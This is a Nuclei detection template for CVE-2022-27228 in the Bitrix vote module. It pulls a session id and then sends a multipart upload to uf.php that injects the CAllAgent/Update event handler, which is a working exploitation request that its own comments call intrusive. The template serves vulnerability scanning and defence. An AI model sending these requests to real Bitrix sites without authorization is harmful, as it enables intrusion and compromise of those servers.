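# Nuclei template for CVE-2022-27228: Bitrix Site Manager, "vote" module
# (Polls, Votes) before 21.0.100.
#
# Two-step flow (see `flow` below):
#   1. GET /bitrix/admin/ and pull the `bitrix_sessid` value out of the page;
#      request 2 sends it back in the `sessid` form field.
#   2. POST a multipart upload to the vote module's uf.php. The query string
#      selects CFileUploader as the entity type and passes `CAllAgent` /
#      `Update` as the `onFileIsStarted` event handler. Per the linked
#      write-ups this handler injection is the primitive that leads to code
#      execution on unpatched installs.
#
# NOTE(review): the final matcher only checks that the uploader answered
# `"status":"done"`. That shows the request went through the vulnerable
# upload/event chain; it does not observe execution of attacker-controlled
# code. A hit is strong but indirect evidence - `verified: false` below is
# honest, and a hit should be confirmed manually before being reported as RCE.
#
# NOTE(review): this is a real exploitation attempt, not a version probe. It
# leaves an uploaded file (body = `marker`) on the target and may create or
# modify an agent record, hence the `intrusive` tag. Run only with explicit
# authorization and plan cleanup on the target afterwards.
#
# Formatting note: the page this was taken from had lost the file's
# indentation, the blank lines inside the multipart body and the
# `{{filename}}` references; they are restored here. `filename` is declared
# in `variables` and is used nowhere else, so the reconstruction is the only
# reading consistent with the rest of the file.
id: CVE-2022-27228

info:
  name: Bitrix Site Manager - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: In the vote (aka "Polls, Votes") module before 21.0.100 of Bitrix Site Manager, a remote unauthenticated attacker can execute arbitrary code.
  impact: Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: Update to version 21.0.100 or later.
  reference:
    - https://alt3r.eg0.ru/p0c5/attacking_bitrix.pdf
    - https://pentestnotes.ru/notes/bitrix_pentest_full/#rce-vote_agentphp-cve-2022-27228
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27228
    cwe-id: CWE-20
    epss-score: 0.79027
    epss-percentile: 0.99012
    cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
  metadata:
    # Not marked verified upstream; see the matcher caveat in the header.
    verified: false
    vendor: bitrix24
    product: bitrix24
    shodan-query: "/bitrix/p3p.xml"
    fofa-query: body="/bitrix/"
  # `intrusive`: the request below actually drives the vulnerable code path.
  tags: cve,cve2022,bitrix,file-upload,rce,intrusive,vkev

variables:
  # Random base name for the uploaded part names/filenames, so repeated runs
  # do not collide and the upload is attributable in the target's logs.
  filename: "{{to_lower(rand_text_alpha(5))}}"
  # Harmless random payload used as the uploaded file's body.
  marker: "{{randstr}}"

# Request 2 depends on `session_id` from request 1; if the admin page does not
# expose bitrix_sessid, the internal matcher fails and the flow stops there.
flow: http(1) && http(2)

http:
  # Step 1: fetch the admin page and extract bitrix_sessid (internal only,
  # never reported as a finding on its own).
  - raw:
      - |
        GET /bitrix/admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'bitrix_sessid')"
        internal: true

    extractors:
      - type: regex
        group: 1
        name: session_id
        regex:
          - "'bitrix_sessid':'(.*?)'"
        internal: true

  # Step 2: multipart upload to the vote module's uploader with the event
  # handler overridden via the query string. Body delimiters are `--` plus the
  # boundary declared in Content-Type; the blank line after each part's
  # headers is required by multipart/form-data.
  - raw:
      - |
        POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx

        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]"

        {{filename}}.txt
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]";filename="{{filename}}.jpg"
        Content-Type: image/jpeg

        {{marker}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[packageIndex]"

        pIndex101
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[mode]"

        upload
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="sessid"

        {{session_id}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[filesCount]"

        1
        -----------------------------xxxxxxxxxxxx--

    # Reports a hit when the uploader accepted the request. This is evidence
    # that the injected event chain was reached, not proof of code execution.
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"status\":\"done\"")'
        condition: and

# The digest below signs the upstream template text. Any edit to this file
# (including the comments above) invalidates it; regenerate it with the
# nuclei template-signing workflow before distributing the modified template.
# digest: 4a0a00473045022100de89b7a8f28c54257dd0d894f0a883ad5cbc2f0bf02efbe11614a341e972bc7c022043a838b4b4f569c3250896424413c58aa04440e710b4f5b7fe939ea7ad24861b:922c64590222798bb761d5b6d8e72950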